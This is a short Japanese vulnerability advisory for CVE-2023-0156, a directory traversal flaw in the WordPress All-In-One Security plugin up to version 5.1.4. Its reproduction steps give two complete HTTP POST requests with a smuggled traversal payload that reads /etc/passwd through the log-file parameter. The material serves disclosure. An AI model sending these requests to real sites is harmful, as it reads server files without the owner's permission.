
CVE ID: CVE-2023-0156
脆弱性タイプ: ディレクトリトラバーサル
説明: WordPress 用 All-In-One Security (AIOS) プラグインは、バージョン 5.1.4 以前においてディレクトリトラバーサルの脆弱性の影響を受けます。これにより、管理者権限を持つ認証済みの攻撃者が、サーバー上の任意のファイルの内容を読み取ることが可能になります。
再現手順:
POST /wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4 HTTP/2
Host: <host>
Cookie: <cookies>
Content-Length: 125
Content-Type: application/x-www-form-urlencoded
_wpnonce=<nonce>&aiowps_system_log_file=..%2F..%2F..%2F..%2Fetc%2Fpasswd&aiowps_search_error_files=View+latest+system+logs
POST /wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4 HTTP/2
Host: <host>
Cookie: <cookies>
Content-Length: 98
Content-Type: application/x-www-form-urlencoded
_wpnonce=<nonce>&aiowps_system_log_file=..%2F&aiowps_search_error_files=View+latest+system+logs
参照: